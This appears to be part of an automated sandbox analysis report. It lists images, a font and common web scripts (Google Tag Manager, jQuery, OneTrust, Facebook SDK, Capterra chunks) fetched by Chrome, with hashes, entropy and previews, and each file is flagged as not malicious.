                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2479
                                                                                                                                                                                                        Entropy (8bit):6.947867643931722
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:2X11LVknA9WpIIFpPu/cb3YHq31HUDj++58vcyPOny71pyfgeRSJmNx8j5FLw:2lvknmWpIc9u/pHCHUZ51yPOnU3uRSi/
                                                                                                                                                                                                        MD5:C192789878FB646B5346608C0E48365E
                                                                                                                                                                                                        SHA1:CE4ACD0C277EB646C78040E24E3B347C239F40A7
                                                                                                                                                                                                        SHA-256:A6B2128DF63E524A8619247ABB987A7FF37FF188F94507A2BED134A9ECA82D0F
                                                                                                                                                                                                        SHA-512:57739297AD83AD1554070A274BB628A1346515DCFD2EC81D922C9071EE4DE87ABE1963652C4E52360B6051F79CD20F9F8A81462D3A23F89C53512B057D25A408
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR... ... .....szz.....pHYs...#...#.x.?v....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop 21.0 (Macintosh)" xmp:CreateDate="2019-11-06T09:47:03Z" xmp:MetadataDate="2019-11-06T09:47:03Z" xmp:ModifyDate="2019-11-06T09:47:03Z" xmpMM:InstanceID="xmp.iid:31036cdc-9cd5-4966-ad80-b38f1c81eec8" xmpMM:DocumentID="adobe:docid:photoshop:df063a2f-a4df-954e-96f4-cb456322f58e" xmpMM:OriginalDocumentID="xmp.did:f0f31cf4-23ac-4375-a1ff-585940563130" dc:format="image/png" photos
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 21508, version 1.0
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):21508
                                                                                                                                                                                                        Entropy (8bit):7.9880543334499885
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:KnDSSIRNb16PJLoYYwxgdAz0PDeKAkc3qDqlxmB5nb2ztGilBTS4NYy:KmSI/ZwLoe0yGqK5bzilBPd
                                                                                                                                                                                                        MD5:24B8A8ABBEC56AB127ADC36E35F49BB3
                                                                                                                                                                                                        SHA1:0906975D70856EF3DF1AE3D91DB5D29687981C3F
                                                                                                                                                                                                        SHA-256:A79B4C65B454A795FF3868156F54BE09AC8360B9FD3BA21431B5C48FD9B66AFA
                                                                                                                                                                                                        SHA-512:1B60C792D65E363D9B4F190EC897685086685940D823D527BC3F4406127F556377A02AC7E8853A82275B0606C579B014006D42BAEE59D7B3B16AA92A335A9078
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/lato/v24/S6u8w4BMUTPHh30AXC-q.woff2
                                                                                                                                                                                                        Preview:wOF2......T...........S...........................z.p.`..`..D....s.....,..X..6...L.6.$..h. ..&..p.r...9..v. "...k{o>.1.a..J..^...:R........."c&...z...+.E&.6L.@....d.(.XV....&9...&.C.....8...Mz...4.\...p.......z...M5.X.joZ..V...`^.|..2.q.8..i..A.....h.+.BC.n.*..-r+..d.._7....Z%........0.aL.'].?.H...d..r..%+.|y.,....x..K..z5R..Y......L.Y}R..........I..j....3.{..0 ..%.G`Y..B.....s6....n...CD4."..%..)....T..B.D.5.....r4.2.l9..3[.n.7.1......?.../[\V.z-.IWt...TB#4B#4B#4B#..H*Ss.$...,-.b2.m..s3..(..>.."H.e#..u{.Z...M.O.E.Q........fg.f..1.N..^..2i K...W.'&X a~.%T.Wo.L.e&._O.....U....~..*^.:..q.*...L..<.px\....$C....].#(.k..g^.^.;..Z.5..WK....d...[.G.|p..C#......Z.........*1.......`D..r*.7..~.|.......>9@.x...]T.KNdt....{.......9...l@....km...6..;...~.&.............?... ..#.....VW.>.k^.l.3......;P4....A.m..FHNx..w.e..4.j.+.^.R.T.TJ.........<....w...P#W"...&...6[4..T.G.]..<.DH...Q......p.2.L..$..@.........o..).a.)W<8n...v..t..G,w..ag:%.T9cv.........
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (46278)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):500506
                                                                                                                                                                                                        Entropy (8bit):5.534945412864792
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:OpAZAeAYg5p9E2b21SAdB6bi3CyG6DYj4cMz4aUlEZtNAJ0wLtpO34BmGX:wAZAeAhp9E2brAv6beCgVUWGa34BV
                                                                                                                                                                                                        MD5:BCDED9617C7F71FF87F1F5738BB7D33E
                                                                                                                                                                                                        SHA1:5FA9CE7E8B5DE7BA0D526B3BA19F6935A0A09FED
                                                                                                                                                                                                        SHA-256:70B7A5E1073664DE7C3F4A7389BF4DE4440C73E119DEF71E69801E19201CBD7D
                                                                                                                                                                                                        SHA-512:137B7CA5A3F31D499B5B6397DF76ECF67551ACB6610669AEFA7ED0D55889A9ED38A033EE2A02E31054DFADF1AC98873235F52F5C33957DF932E15635F6F90EC0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.googletagmanager.com/gtm.js?id=GTM-P4GLD4N
                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"871",. . "macros":[{"function":"__v","vtp_name":"gtm.elementUrl","vtp_dataLayerVersion":1},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"optout_gtmclick_clickout"},{"function":"__e"},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":",C0001,","vtp_name":"OnetrustActiveGroups"},{"function":"__r"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__c","vtp_value":"Capterra"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ppc_monetization_status"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaul
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (31385), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):31385
                                                                                                                                                                                                        Entropy (8bit):5.298161108135626
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:46IrtGY4trjTtMoboL6bcLIiJGDPB8Sc7b:DIrEYuXSoboOcLXcs3
                                                                                                                                                                                                        MD5:C9861C1AC17232AECA7AB6802D7A8E19
                                                                                                                                                                                                        SHA1:6E764706BC5868FF3F536C7501DCF2F6E04E67E7
                                                                                                                                                                                                        SHA-256:E81237DD0B5C2660519182F90191B45FD50C245005A9F1DCEAE9B05BA01809BA
                                                                                                                                                                                                        SHA-512:14F2FC95E18F5FE7D7A3C882DECE3510C2A87EEF406B25AB54EDD4BFE2904D8ADF9D671CAEF7271A0F3FB2B0394A6EEF6941B4E5BAA4870CB198E8DF94524DAE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://sc.lfeeder.com/lftracker_v1_bElvO73dOjE4ZMqj.js
                                                                                                                                                                                                        Preview:!function(){"use strict";function c(n){var e=U();return e[n]=e[n]||{id:n,plugins:{},getPlugins:function(){var n,e=[];for(n in this.plugins)e.push(this.plugins[n]);return e},autoTrackingInitialized:!1},e[n]}function P(n,e){n=c(n);return n.plugins[e]=n.plugins[e]||{},n.plugins[e]}function U(){var n=y();return n.r=n.r||{},n.r}d()&&(window.ldfdr.registerTracker=function(n,e,t,r,i,o,a){return(n=c(n)).track=e,n.identify=t,n.pageview=r,n.getClientId=i,n.acceptCookie=o,n.rejectCookie=a,n},window.ldfdr.setTrackerOption=function(n,e,t,r){c(n)[e]=void 0!==r?r:t},window.ldfdr.registerPlugin=function(n,e,t){var r=c(n),i=P(n,e);i.init=function(){try{t()}catch(n){console.error("Error during plugin initialization",i,n)}},r.pluginsInitialized&&i.init()},window.ldfdr.registerPluginConfig=function(n,e,t,r){P(n,e).config=void 0!==r?r:t});var n,e,j,k="bElvO73dOjE4ZMqj",J="2.64.0",G="_lfa_debug_settings",F=["cookieDomain","enableAutoTracking","trackingCookieDurationDays"];if("undefined"!=typeof window&&void
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (9650), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):9650
                                                                                                                                                                                                        Entropy (8bit):5.461928917834568
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Z5Aa4vBQIaYL5tgGrAz1ssMufHpVqE9g9:cVeKtXrAz1ssMufJVqE9q
                                                                                                                                                                                                        MD5:F59F92A8B9BCC9E522ED883D6EDFA94E
                                                                                                                                                                                                        SHA1:80E72F5D94040279428D070F6BAB3B669C231EC3
                                                                                                                                                                                                        SHA-256:C8D500CFEC3F3DEDA70D57AE112D4616F76C2897951717750E7E1F47F2C97287
                                                                                                                                                                                                        SHA-512:63F1D0DE69C820C8AFC02B383D92231AE0C4A55BEE2D164F77BD42A303A7BC92F9AD47CB17A1671F5BBD2378A7361F43DAFA209164B077AE3A969CEA5AEB6DCA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/static/chunks/8115-160754d83a0f726e.js
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8115],{80978:function(t,e,n){n.d(e,{h:function(){return r.hU}});var r=n(20857)},37213:function(t,e){e.Z=t=>{void 0===window.dataLayer?console.warn("window.dataLayer is undefined"):window.dataLayer.push(t)}},11684:function(t,e,n){var r=n(37213);let o=(t,e)=>{let n={};return Object.keys(t).forEach(e=>{n[e]=t[e]}),n.ProductCategoryName=e,n},a=()=>{let t=window.document.querySelector('meta[name="productCategory"]');return t instanceof HTMLMetaElement&&null!=t?"".concat(t.content," Software"):null},i=(t,e)=>{let n={event:"dirpaClick",customDimensions:{},category:t.category,action:t.action};if(e){var r,i;null===(i=window)||void 0===i||null===(r=i.ga)||void 0===r||r.call(i,"send","pageview",e)}return Object.keys(t).forEach(e=>{t[e]&&(t[e].length>0||Object.keys(t[e]).length>0)&&("customDimensions"===e?n.customDimensions=o(t[e],a()):n[e]=t[e])}),n};e.Z=t=>{let{data:e,path:n}=t,o=i(e,n);(0,r.Z)(o)}},32946:function(t,e,n){n.d(e
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65451)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):457713
                                                                                                                                                                                                        Entropy (8bit):5.359724172933691
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:cIba05axBBnE7qecH+bMxjVUYHXKuYbN0ShGZa3Qaeu+QFs:cRqaxBBnE7qnU1bNp3Q82
                                                                                                                                                                                                        MD5:F46AB853BFF0C58B3D7A4F8EBDB1E0F7
                                                                                                                                                                                                        SHA1:B537C503507697D58FDF4599C0D9DDAC93BEBEFF
                                                                                                                                                                                                        SHA-256:1E4B4FC897B28572139D99A48B119F8B81E71B8B0A262463D798D08176FCBB6F
                                                                                                                                                                                                        SHA-512:9A60DA31655306CF4AA549AF3387B398FA0F298C35AA46495C9BB465B56FCC0BF29EE56300EEC83AA9E6597B02119A8606852CAA06C75588177C0AA436F75BC4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:/** . * onetrust-banner-sdk. * v202403.2.0. * by OneTrust LLC. * Copyright 2024 . */.!function(){"use strict";var x=function(e,t){return(x=Object.setPrototypeOf||({__proto__:[]}instanceof Array?function(e,t){e.__proto__=t}:function(e,t){for(var o in t)Object.prototype.hasOwnProperty.call(t,o)&&(e[o]=t[o])}))(e,t)};function D(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Class extends value "+String(t)+" is not a constructor or null");function o(){this.constructor=e}x(e,t),e.prototype=null===t?Object.create(t):(o.prototype=t.prototype,new o)}var H,R=function(){return(R=Object.assign||function(e){for(var t,o=1,n=arguments.length;o<n;o++)for(var r in t=arguments[o])Object.prototype.hasOwnProperty.call(t,r)&&(e[r]=t[r]);return e}).apply(this,arguments)};function u(e,s,a,l){return new(a=a||Promise)(function(o,t){function n(e){try{i(l.next(e))}catch(e){t(e)}}function r(e){try{i(l.throw(e))}catch(e){t(e)}}function i(e){var t;e.done?o(e.value):((t=e.value)instanceof a?t:new a(fun
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5762
                                                                                                                                                                                                        Entropy (8bit):7.383011485514194
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+7jY5N26MT0D5MdtbZPAVwzVJFeN3QHDk8Oie1vlWaan0uN5IGt:+7UoYNMtKwXFeOw8OieHW70uNCGt
                                                                                                                                                                                                        MD5:0D8EA8628AC284ABCC16F4EF10A9C1B6
                                                                                                                                                                                                        SHA1:5B2E8FCE159470DCF8466EBDAA46FCA4FCF6ADDD
                                                                                                                                                                                                        SHA-256:2C470593C7E485E69DB40F41D6B3F33C67D93EC4C816E26D16BBC3142897B618
                                                                                                                                                                                                        SHA-512:D565BA154633FC04758E36A895FC4B17482C9DF90493ECD7E464BF0548AD90C704566E299C0C1216EA7FC92A842EF73B5B8BFE3313C000BB866C3DF9674EE6B3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/507b7e72-a477-4dee-a78d-fb9cc5d95d75.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D..............................{...Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (42312)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):657821
                                                                                                                                                                                                        Entropy (8bit):5.563419225782083
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:vIPMgec2NlbsBICMQ/Zk9hKkYQl8skN+H1yMp2dBO7NQzPh8Bq:A08UlbsBIj/kN+H1yMQdBO7yzeBq
                                                                                                                                                                                                        MD5:269ED64386507906A1A80D570BC21480
                                                                                                                                                                                                        SHA1:6BACDC786859B5D9B6F5DF0B3806CD9A54F04197
                                                                                                                                                                                                        SHA-256:904A22A0F87B213C8E6919C4D680B14017E6CC437025724D5E1164AAF6CA4469
                                                                                                                                                                                                        SHA-512:70CA0A3E8DB2EFA748F73A488DB46CE7E7FDA2642E5973D500F722ED91007A58CA9182695F05F9F76A5990BC3D80660814CB8F1DF7B1DA8ACD4908C2A7562241
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/js/webflow.js
                                                                                                                                                                                                        Preview:./*!. * Webflow: Front-end site library. * @license MIT. * Inline scripts may access the api using an async handler:. * var Webflow = Webflow || [];. * Webflow.push(readyFunction);. */..(()=>{var cw=Object.create;var ki=Object.defineProperty;var hw=Object.getOwnPropertyDescriptor;var fw=Object.getOwnPropertyNames;var pw=Object.getPrototypeOf,dw=Object.prototype.hasOwnProperty;var Ee=(e,t)=>()=>(e&&(t=e(e=0)),t);var E=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports),Ue=(e,t)=>{for(var r in t)ki(e,r,{get:t[r],enumerable:!0})},ih=(e,t,r,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let i of fw(t))!dw.call(e,i)&&i!==r&&ki(e,i,{get:()=>t[i],enumerable:!(n=hw(t,i))||n.enumerable});return e};var me=(e,t,r)=>(r=e!=null?cw(pw(e)):{},ih(t||!e||!e.__esModule?ki(r,"default",{value:e,enumerable:!0}):r,e)),dt=e=>ih(ki({},"__esModule",{value:!0}),e);var $s=E(()=>{"use strict";window.tram=function(e){function t(M,j){var W=new k.Bare;return W.init(M,j)}function r(M){return M.replac
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (13031), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):13031
                                                                                                                                                                                                        Entropy (8bit):5.351607715367155
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:QtXdCyjj89b5U5/CyAG1msiOE0CpijCp+o9BoV5cYxGMazCyKm9kXQQ3B5Cy5o9U:A29MZXRCaCZ9w5cEGM094QQVo9U
                                                                                                                                                                                                        MD5:B676BBD8A3B5E74078FF7B6B340CDECD
                                                                                                                                                                                                        SHA1:1FD81E87DB9EA81304C4EE41362DD99EFDE90389
                                                                                                                                                                                                        SHA-256:7A9F84BFFCFF2893BD87767A139B4A0E5EF39BD155263EF64E8F74FB0DEFC1F5
                                                                                                                                                                                                        SHA-512:F666CD4D5695351CFED7681E23F340C0FE6C6489FDCE4D9DA56B0A313F1811ECA21547A0D6CA3C339CE0F9CCEE65534AF78CE1275A8E6124A1C51AEFE13E947C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://reviews.capterra.com/_next/static/chunks/7357.225fc1d616fbda8a.js
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7357],{70947:function(e,r,t){"use strict";t.d(r,{Z:function(){return Z}});var n,o=t(2784),i=t(2550),a=t(16734),l=function(){},s=o.createContext({isOpen:!1,isGapless:!1,show:l,hide:l,triggerRef:null,align:"left"}),c=t(90051),d=["children","className","selected","disabled"];function u(){return(u=Object.assign?Object.assign.bind():function(e){for(var r=1;r<arguments.length;r++){var t=arguments[r];for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n])}return e}).apply(this,arguments)}var f=o.forwardRef(function(e,r){var t=e.children,n=e.className,l=e.selected,s=e.disabled,c=function(e,r){if(null==e)return{};var t,n,o=function(e,r){if(null==e)return{};var t,n,o={},i=Object.keys(e);for(n=0;n<i.length;n++)t=i[n],r.indexOf(t)>=0||(o[t]=e[t]);return o}(e,r);if(Object.getOwnPropertySymbols){var i=Object.getOwnPropertySymbols(e);for(n=0;n<i.length;n++)t=i[n],!(r.indexOf(t)>=0)&&Object.prototype.propertyIsEnumerable.call(e,t)&
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 1280 x 720, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):186927
                                                                                                                                                                                                        Entropy (8bit):7.9806186505406185
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:XNvWiSA3nWMT9M1USJNwYU2vKXPzDNbrTTWW8d/2LaOTJCT0dOQD:XtiRMT9M1USJ6f2vorFrTyR1gpdOW
                                                                                                                                                                                                        MD5:31A794D8D45FE233A66A47C2DB02A682
                                                                                                                                                                                                        SHA1:E4321FD29FED20727DE25C98C5F8A6D960316E69
                                                                                                                                                                                                        SHA-256:F8616737CB5D37705D497DA5555CC78E8E21AA18E6D786403F0897E88C503D7E
                                                                                                                                                                                                        SHA-512:783AA5BD891BA5D38BD30D14775350AC065CDC426874A2FFCC06A56D5255429EC81B103ADBBAE2E0349FBB470F2C1065960DB9EC82EB93E6BA2BC5C97F77866F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://indd.adobe.com/content/2/30080812-36e9-4257-a76c-64b9db55c4c1/1725012499262/package/1/publication-web-resources/image/Sharepoint_Doc.png
                                                                                                                                                                                                        Preview:.PNG........IHDR..............}.V....pHYs..........o.d.. .IDATx^.k..:..H.....3...P....q...D...eYv8"#...(TF./.-_..H...?......7. .. .. .. .. .^...................O..._... .. .. .>......M..A.S......?.(.. .. .. .. ...K..A..A..A..A..A...&...LJ....dA..A..A....}.J"....A.{..0.....h. .. .. .._...<...`......./MJ...g..A..A.._.~.f..A.!B...6.....A..A..A..ApA....&. .. .. .. ..k"v2.. .. .. .. ..1!..A..A..A..A...7&.. .. .. .. .. .....A..A..A..A...... .. .. .. ......`..A..A..A..A.|cB... .. .. .. ..oL..A..A..A..A..A....0.. .. .. .. ..1!..A..A..A..A...7&.. .. .. .. .. .....A..A..A..A...... .. .. .. ......`..A..A..A..A.|cB... .. .. .. ..oL..A..A..A..A..A....0.. .. .. .. ..1!..A..A..A..A...7&.. .. .. .. .. .....A..A..A..A...... .. .. .. ......`..A..A..A..A.|cB... .. .. .. ..oL..A..A..A..A..A...&....Rj.>...`N`.~... %..0.........4.V._....e<Z.ga.....=;N~L....t.D*..D........*./....v..8..~.rZN.u../.=..g...W\/.k{\....#~....{..Wp..`...q;.m.....m.z&...:/.....}1.. ....0..0..H."....P.*
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                        Entropy (8bit):2.7773627950641693
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                                        MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                                        SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                                        SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                                        SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://td.doubleclick.net/td/ga/rul?tid=G-8ML5ENYGMT&gacid=1381680606.1725034579&gtm=45je48s0v887450065z8850968419za200zb850968419&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=0&z=1212565528
                                                                                                                                                                                                        Preview:<html></html>
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):89501
                                                                                                                                                                                                        Entropy (8bit):5.289893677458563
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (18641)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):312212
                                                                                                                                                                                                        Entropy (8bit):5.500507680185584
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:XVPCQYGPrpc3j/yBNtuQAgaI3YPhpR4JXcC:XPm/yBNtUL3C
                                                                                                                                                                                                        MD5:8256C1883573912D3DAB7A5FAA4A258D
                                                                                                                                                                                                        SHA1:A751453937FC00F7D50364ED0E5F69700AB62872
                                                                                                                                                                                                        SHA-256:375D1A58ACB1BA0DAF96D391E61525A3B6B981ACC8E60B274CBE562AFC407195
                                                                                                                                                                                                        SHA-512:5FF4273C8D0B9EE30093E72883A69469B781FA14B4A0BE811C15DEF4292899D40C8F480725C83FE29C0561B55D1AC55E2920E0DD545FACBA0790C21D3C2F2073
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://connect.facebook.net/en_US/sdk.js?hash=cfe36e7e683e5528b12db8f17a4d3eaa
                                                                                                                                                                                                        Preview:/*1725031336,,JIT Construction: v1016108272,en_US*/../**. * Copyright (c) 2017-present, Facebook, Inc. All rights reserved.. *. * You are hereby granted a non-exclusive, worldwide, royalty-free license to use,. * copy, modify, and distribute this software in source code or binary form for use. * in connection with the web services and APIs provided by Facebook.. *. * As with any software that integrates with the Facebook platform, your use of. * this software is subject to the Facebook Platform Policy. * [http://developers.facebook.com/policy/]. This copyright notice shall be. * included in all copies or substantial portions of the software.. *. * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR. * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS. * FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR. * COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER. * IN AN ACTION OF CO
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 32 x 32, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1212
                                                                                                                                                                                                        Entropy (8bit):7.1780142868542125
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:hacOyLmjOI6zwXeRJJsxP7j1QxFkDDxg+ylJQQvkNVRvn15:hacOyyQwXs+xP7je62QNj9
